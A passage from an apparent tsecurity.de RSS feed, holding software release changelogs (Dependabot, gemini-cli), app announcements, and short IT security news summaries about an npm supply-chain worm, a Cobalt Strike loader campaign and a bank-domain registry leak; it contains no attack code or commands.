<li>fix(opentofu): accept terraform_registry credentials for OCI registry tags by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4750827433" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15422" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15422/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15422">#15422</a></li>
<li>Commit changes to workspace member TOML files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/crabbit-git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/crabbit-git">@crabbit-git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4523481545" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15142" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15142/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15142">#15142</a></li>
<li>Fix COREPACK_NPM_REGISTRY trailing slash causing pnpm HTTP 404 on private registries by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4768494620" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15444" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15444/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15444">#15444</a></li>
<li>Map additional NuGet feed errors to private_source_bad_response by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4753622799" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15426" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15426/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15426">#15426</a></li>
<li>Support <code>version</code> and <code>security</code> NuGet job commands by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4754398088" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15430" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15430/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15430">#15430</a></li>
<li>Show the vcpkg release tag instead of master in PR titles by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4755756847" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15433" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15433/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15433">#15433</a></li>
<li>Register MSBuild before running the job so early NuGet errors are reported by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4755361507" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15431" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15431/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15431">#15431</a></li>
<li>Add a baseline to vcpkg projects missing one by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4755503458" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15432" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15432/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15432">#15432</a></li>
<li>Fix file updater failed to update for all support files sentry error by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4749866303" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15421" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15421/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15421">#15421</a></li>
<li>Skip disabled Maven repositories by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adoroszlai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adoroszlai">@adoroszlai</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4767441385" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15443" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15443/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15443">#15443</a></li>
<li>v0.384.0 by @dependabot-core-action-automation[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4764477683" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15438" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15438/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15438">#15438</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/crabbit-git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/crabbit-git">@crabbit-git</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4523481545" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15142" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15142/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15142">#15142</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adoroszlai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adoroszlai">@adoroszlai</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4767441385" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15443" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15443/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15443">#15443</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/dependabot/dependabot-core/compare/v0.383.0...v0.384.0"><tt>v0.383.0...v0.384.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Too many junk files on your Windows PC? This free tool can remove them in one click]]></title>
<description><![CDATA[A utility called Fluent Cleaner will analyze your Windows environment to find and remove junk files, temp files, unused Registry entries, and other clutter - for free. Here's how to use it.]]></description>
<link>https://tsecurity.de/de/3635027/it-nachrichten/too-many-junk-files-on-your-windows-pc-this-free-tool-can-remove-them-in-one-click/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635027/it-nachrichten/too-many-junk-files-on-your-windows-pc-this-free-tool-can-remove-them-in-one-click/</guid>
<pubDate>Tue, 30 Jun 2026 11:17:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A utility called Fluent Cleaner will analyze your Windows environment to find and remove junk files, temp files, unused Registry entries, and other clutter - for free. Here's how to use it.]]></content:encoded>
</item>
<item>
<title><![CDATA[India’s central bank mandated use of .bank domains to enhance trust – but its registry leaked sensitive info]]></title>
<description><![CDATA[Open API leaked everything an attacker needs to impersonate bank officials]]></description>
<link>https://tsecurity.de/de/3634405/it-security-nachrichten/indias-central-bank-mandated-use-of-bank-domains-to-enhance-trust-but-its-registry-leaked-sensitive-info/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634405/it-security-nachrichten/indias-central-bank-mandated-use-of-bank-domains-to-enhance-trust-but-its-registry-leaked-sensitive-info/</guid>
<pubDate>Tue, 30 Jun 2026 04:35:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Open API leaked everything an attacker needs to impersonate bank officials]]></content:encoded>
</item>
<item>
<title><![CDATA[India’s central bank mandated use of .bank domains to enhance trust – but its registry leaked sensitive info]]></title>
<description><![CDATA[Open API leaked everything an attacker needs to impersonate bank officials This article has been indexed from www.theregister.com – Articles Read the original article: India’s central bank mandated use of .bank domains to enhance trust – but its registry leaked…
Read more →
The post India’s centr...]]></description>
<link>https://tsecurity.de/de/3634403/it-security-nachrichten/indias-central-bank-mandated-use-of-bank-domains-to-enhance-trust-but-its-registry-leaked-sensitive-info/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634403/it-security-nachrichten/indias-central-bank-mandated-use-of-bank-domains-to-enhance-trust-but-its-registry-leaked-sensitive-info/</guid>
<pubDate>Tue, 30 Jun 2026 04:35:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Open API leaked everything an attacker needs to impersonate bank officials This article has been indexed from www.theregister.com – Articles Read the original article: India’s central bank mandated use of .bank domains to enhance trust – but its registry leaked…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/indias-central-bank-mandated-use-of-bank-domains-to-enhance-trust-but-its-registry-leaked-sensitive-info/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/indias-central-bank-mandated-use-of-bank-domains-to-enhance-trust-but-its-registry-leaked-sensitive-info/">India’s central bank mandated use of .bank domains to enhance trust – but its registry leaked sensitive info</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[A New Linux Calendar is Here ~ Introducing Dank Calendar ~ the latest DankLinux app!]]></title>
<description><![CDATA[Introducing Dank Calendar, a DankLinux application. - built by u/bbedward DankCalendar is a beautiful, powerful solution for calendar management on Linux that unifies Local, Google, Microsoft, CalDAV, and iCloud calendars into a single agenda. It features background synchronization, native tasks,...]]></description>
<link>https://tsecurity.de/de/3634376/linux-tipps/a-new-linux-calendar-is-here-introducing-dank-calendar-the-latest-danklinux-app/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634376/linux-tipps/a-new-linux-calendar-is-here-introducing-dank-calendar-the-latest-danklinux-app/</guid>
<pubDate>Tue, 30 Jun 2026 04:08:34 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p><strong>Introducing Dank Calendar, a DankLinux application.</strong><br> <strong>-</strong> built by <a href="https://www.reddit.com/u/bbedward">u/bbedward</a></p> <p><strong>DankCalendar</strong> is a beautiful, powerful solution for calendar management on Linux that unifies Local, Google, Microsoft, CalDAV, and iCloud calendars into a single agenda. It features background synchronization, native tasks, events, reminders, secure credential storage, a comprehensive GUI, keyboard-driven navigation, and a scriptable IPC interface. </p> <p>It is available now on every DankLinux supported distro: <strong>Arch, Fedora, Debian, Ubuntu, NixOS, Void and openSUSE</strong>. It is deeply integrated into the upcoming <strong>DMS v1.5</strong> and is 100% functional on its own!</p> <p><strong>Why a new Linux calendar?</strong></p> <p>It fits the Dank philosophy of focused tools (<a href="https://danklinux.com/docs/dgop/">dgop</a>, <a href="https://danklinux.com/docs/danksearch/">dsearch</a>) that do one thing well and integrate together, without unnecessary dependencies or assumptions about your setup. The calendar is a core part of the user experience, so it deserves a first-party solution that works well with the shell and with your existing accounts.</p> <p>khal and vdirsyncer are scriptable and lightweight, but they're two tools you wire together yourself. You write a <code>vdirsyncer</code> config, set up OAuth tokens by hand, run sync on a cron, then point khal at the output. It's not a user-friendly or comprehensive solution.</p> <p>Evolution and Evolution Data Server are powerful, but they're tied to the GNOME desktop and incredibly difficult to build on or integrate with. The calendar is just one part of a huge suite of apps sharing the EDS backend.</p> <ul> <li>The calendar is buried inside an Outlook-style suite, and account setup is spread across GNOME Settings, GNOME Online Accounts, and Evolution itself, so it's never clear which one actually owns a calendar.</li> <li>EDS is a shared backend, which is a good idea, but its API is GObject/C with async GLib and very few real examples. Writing a launcher widget, a shell card, or a CLI against it means digging through source-registry concepts and <code>ECalClient</code> instead of calling something simple.</li> <li>It drags in a heavy GTK and WebKitGTK stack and assumes you're on GNOME, which is awkward on niri, Hyprland, Sway, KDE, or a custom shell.</li> </ul> <p>DankCalendar keeps the good part of that idea, one synced backend that lots of things can read, but makes it pleasant to use and to build on: sign-in style account setup, a local cache that works offline, a documented IPC API (<code>dcal ipc events.list</code>, <code>events.create</code>, and so on) with JSON output, and a daemon-plus-frontends design that behaves the same on any compositor.</p> <p>Read the full release notes at: <a href="https://danklinux.com/blog/dankcalendar-release">https://danklinux.com/blog/dankcalendar-release</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Purian23"> /u/Purian23 </a> <br> <span><a href="https://danklinux.com/blog/dankcalendar-release">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uj7d9r/a_new_linux_calendar_is_here_introducing_dank/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Warner bill would create federally vetted list for secure, trustworthy AI agents]]></title>
<description><![CDATA[The bill empowers the FTC to create a registry for sellers of AI agent software certifying their privacy and cybersecurity protections. 
The post Warner bill would create federally vetted list for secure, trustworthy AI agents appeared first on CyberScoop.]]></description>
<link>https://tsecurity.de/de/3634127/it-security-nachrichten/warner-bill-would-create-federally-vetted-list-for-secure-trustworthy-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634127/it-security-nachrichten/warner-bill-would-create-federally-vetted-list-for-secure-trustworthy-ai-agents/</guid>
<pubDate>Mon, 29 Jun 2026 23:37:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The bill empowers the FTC to create a registry for sellers of AI agent software certifying their privacy and cybersecurity protections. </p>
<p>The post <a href="https://cyberscoop.com/ai-agent-act-senate-draft-bill-mark-warner/">Warner bill would create federally vetted list for secure, trustworthy AI agents</a> appeared first on <a href="https://cyberscoop.com/">CyberScoop</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Malaysia considers National Internet Registry]]></title>
<description><![CDATA[Malaysia has launched a public consultation on establishing a National Internet Registry (NIR) that would give the government authority over IP address and autonomous system number allocation within the country. This article has been indexed from CyberMaterial Read the original…
Read more →
The p...]]></description>
<link>https://tsecurity.de/de/3632827/it-security-nachrichten/malaysia-considers-national-internet-registry/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632827/it-security-nachrichten/malaysia-considers-national-internet-registry/</guid>
<pubDate>Mon, 29 Jun 2026 14:09:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Malaysia has launched a public consultation on establishing a National Internet Registry (NIR) that would give the government authority over IP address and autonomous system number allocation within the country. This article has been indexed from CyberMaterial Read the original…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/malaysia-considers-national-internet-registry/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/malaysia-considers-national-internet-registry/">Malaysia considers National Internet Registry</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[npm-Registry: 72-Stunden-Freeze schützt kritische Konten - Ad-hoc-news.de]]></title>
<description><![CDATA[Cybersicherheitsexperten warnen vor zunehmenden KI-Angriffen auf Social-Media-Profile. Drei Hauptvektoren identifiziert. KI-gestützte Hacker: Neue ...]]></description>
<link>https://tsecurity.de/de/3630241/hacking/npm-registry-72-stunden-freeze-schuetzt-kritische-konten-ad-hoc-newsde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3630241/hacking/npm-registry-72-stunden-freeze-schuetzt-kritische-konten-ad-hoc-newsde/</guid>
<pubDate>Sat, 27 Jun 2026 23:38:47 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cybersicherheitsexperten warnen vor zunehmenden KI-Angriffen auf Social-Media-Profile. Drei Hauptvektoren identifiziert. KI-gestützte <b>Hacker</b>: Neue ...]]></content:encoded>
</item>
<item>
<title><![CDATA[SharkLoader-Framework liefert Cobalt-Strike über DLL-Hijacking in StrikeShark-Angriffen]]></title>
<description><![CDATA[BERLIN / LONDON (IT BOLTWISE) – Sicherheitsforscher melden eine neue Malware-Familie namens SharkLoader, die in der Kampagne StrikeShark auf kompromittierten Systemen Cobalt-Strike Beacon nachlädt. Im Fokus stehen offenbar diplomatische Stellen, Regierungsorganisationen und Softwareentwickler in ...]]></description>
<link>https://tsecurity.de/de/3628408/it-security-nachrichten/sharkloader-framework-liefert-cobalt-strike-ueber-dll-hijacking-in-strikeshark-angriffen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628408/it-security-nachrichten/sharkloader-framework-liefert-cobalt-strike-ueber-dll-hijacking-in-strikeshark-angriffen/</guid>
<pubDate>Fri, 26 Jun 2026 21:09:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-sharkloader-strikeshark-cobaltstrike-dllhijacking.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-sharkloader-strikeshark-cobaltstrike-dllhijacking.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-sharkloader-strikeshark-cobaltstrike-dllhijacking-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-sharkloader-strikeshark-cobaltstrike-dllhijacking-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-sharkloader-strikeshark-cobaltstrike-dllhijacking-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-sharkloader-strikeshark-cobaltstrike-dllhijacking-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-sharkloader-strikeshark-cobaltstrike-dllhijacking-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BERLIN / LONDON (IT BOLTWISE) – Sicherheitsforscher melden eine neue Malware-Familie namens SharkLoader, die in der Kampagne StrikeShark auf kompromittierten Systemen Cobalt-Strike Beacon nachlädt. Im Fokus stehen offenbar diplomatische Stellen, Regierungsorganisationen und Softwareentwickler in mehreren Ländern, wobei die initiale Zugriffsstrategie stark auf öffentlich bekannte Schwachstellen setzt. Besonders auffällig ist die technische Kette: Web Shells, Registry-Run-Keys […]</p>
<div><a href="https://www.it-boltwise.de/sharkloader-framework-liefert-cobalt-strike-ueber-dll-hijacking-in-strikeshark-angriffen.html">... den vollständigen Artikel <strong>»SharkLoader-Framework liefert Cobalt-Strike über DLL-Hijacking in StrikeShark-Angriffen«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/sharkloader-framework-liefert-cobalt-strike-ueber-dll-hijacking-in-strikeshark-angriffen.html">SharkLoader-Framework liefert Cobalt-Strike über DLL-Hijacking in StrikeShark-Angriffen</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mini Shai-Hulud Worm Poisons LeoPlatform npm Packages to Steal Developer and CI/CD Secrets]]></title>
<description><![CDATA[A fresh supply-chain wave tied to the Mini Shai-Hulud, Miasma, and Hades malware families is actively poisoning npm packages in the LeoPlatform and RStreams ecosystems and expanding into source-repository compromises. The intrusion blends registry poisoning, install-time execution via binding.gyp...]]></description>
<link>https://tsecurity.de/de/3626429/it-security-nachrichten/mini-shai-hulud-worm-poisons-leoplatform-npm-packages-to-steal-developer-and-cicd-secrets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626429/it-security-nachrichten/mini-shai-hulud-worm-poisons-leoplatform-npm-packages-to-steal-developer-and-cicd-secrets/</guid>
<pubDate>Fri, 26 Jun 2026 08:09:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A fresh supply-chain wave tied to the Mini Shai-Hulud, Miasma, and Hades malware families is actively poisoning npm packages in the LeoPlatform and RStreams ecosystems and expanding into source-repository compromises. The intrusion blends registry poisoning, install-time execution via binding.gyp, Bun-staged JavaScript loaders, GitHub Actions abuse, and persistence hooks for IDEs and AI coding assistants an […]</p>
<p>The post <a href="https://gbhackers.com/shai-hulud-worm-poisons-leoplatform/">Mini Shai-Hulud Worm Poisons LeoPlatform npm Packages to Steal Developer and CI/CD Secrets</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mini Shai-Hulud Worm Poisons LeoPlatform npm Packages to Steal Developer and CI/CD Secrets]]></title>
<description><![CDATA[A fresh supply-chain wave tied to the Mini Shai-Hulud, Miasma, and Hades malware families is actively poisoning npm packages in the LeoPlatform and RStreams ecosystems and expanding into source-repository compromises. The intrusion blends registry poisoning, install-time execution via binding.gyp...]]></description>
<link>https://tsecurity.de/de/3626425/it-security-nachrichten/mini-shai-hulud-worm-poisons-leoplatform-npm-packages-to-steal-developer-and-cicd-secrets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626425/it-security-nachrichten/mini-shai-hulud-worm-poisons-leoplatform-npm-packages-to-steal-developer-and-cicd-secrets/</guid>
<pubDate>Fri, 26 Jun 2026 08:09:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A fresh supply-chain wave tied to the Mini Shai-Hulud, Miasma, and Hades malware families is actively poisoning npm packages in the LeoPlatform and RStreams ecosystems and expanding into source-repository compromises. The intrusion blends registry poisoning, install-time execution via binding.gyp, Bun-staged…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/mini-shai-hulud-worm-poisons-leoplatform-npm-packages-to-steal-developer-and-ci-cd-secrets/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/mini-shai-hulud-worm-poisons-leoplatform-npm-packages-to-steal-developer-and-ci-cd-secrets/">Mini Shai-Hulud Worm Poisons LeoPlatform npm Packages to Steal Developer and CI/CD Secrets</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Release v0.50.0-preview.1]]></title>
<description><![CDATA[What's Changed

fix/verify release npm ci ignore scripts by @rmedranollamas in #28116
fix(ci): prevent workspace binary shadowing in release verification by @galz10 in #28132
Feat/tool registry discovery by @ved015 in #28113
fix(ci): prevent bad NPM releases and promote job crashes by @galz10 in ...]]></description>
<link>https://tsecurity.de/de/3625787/downloads/release-v0500-preview1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625787/downloads/release-v0500-preview1/</guid>
<pubDate>Thu, 25 Jun 2026 22:16:38 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>fix/verify release npm ci ignore scripts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rmedranollamas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rmedranollamas">@rmedranollamas</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4731380905" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28116" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28116/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28116">#28116</a></li>
<li>fix(ci): prevent workspace binary shadowing in release verification by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galz10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galz10">@galz10</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4738727594" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28132" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28132/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28132">#28132</a></li>
<li>Feat/tool registry discovery by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ved015/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ved015">@ved015</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4728648296" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28113" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28113/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28113">#28113</a></li>
<li>fix(ci): prevent bad NPM releases and promote job crashes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galz10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galz10">@galz10</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4746204393" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28147" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28147/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28147">#28147</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/google-gemini/gemini-cli/compare/v0.49.0-preview.0...v0.50.0-preview.1"><tt>v0.49.0-preview.0...v0.50.0-preview.1</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Release v0.49.0]]></title>
<description><![CDATA[What's Changed

chore(release): bump version to 0.48.0-nightly.20260609.g3a13b8eeb by @gemini-cli-robot in #27779
ci(dependabot): enable cooldown period for npm packages by @ruomengz in #27743
refactor(core): standardize tool output formatting by @galz10 in #27772
ci: update workflow logging and ...]]></description>
<link>https://tsecurity.de/de/3625786/downloads/release-v0490/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625786/downloads/release-v0490/</guid>
<pubDate>Thu, 25 Jun 2026 22:16:37 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>chore(release): bump version to 0.48.0-nightly.20260609.g3a13b8eeb by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gemini-cli-robot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gemini-cli-robot">@gemini-cli-robot</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4627893739" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27779" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27779/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27779">#27779</a></li>
<li>ci(dependabot): enable cooldown period for npm packages by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ruomengz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ruomengz">@ruomengz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4613795997" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27743" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27743/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27743">#27743</a></li>
<li>refactor(core): standardize tool output formatting by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galz10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galz10">@galz10</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4625973163" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27772" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27772/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27772">#27772</a></li>
